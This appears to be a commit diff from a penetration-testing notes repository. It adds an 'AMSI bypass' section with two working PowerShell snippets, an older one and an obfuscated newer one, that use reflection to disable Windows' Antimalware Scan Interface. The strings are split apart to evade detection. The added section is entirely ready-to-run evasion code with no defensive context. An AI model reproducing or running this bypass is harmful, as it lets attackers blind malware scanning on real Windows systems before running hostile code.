commit
177537e422
@ -304,6 +304,13 @@ Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
|
||||
## AMSI bypass
|
||||
|
||||
```text
|
||||
(old)
|
||||
[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
|
||||
|
||||
(new)
|
||||
$a = 'System.Management.Automation.A';$b = 'ms';$u = 'Utils'
|
||||
$assembly = [Ref].Assembly.GetType(('{0}{1}i{2}' -f $a,$b,$u))
|
||||
$field = $assembly.GetField(('a{0}iInitFailed' -f $b),'NonPublic,Static')
|
||||
$field.SetValue($null,$true)
|
||||
```
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user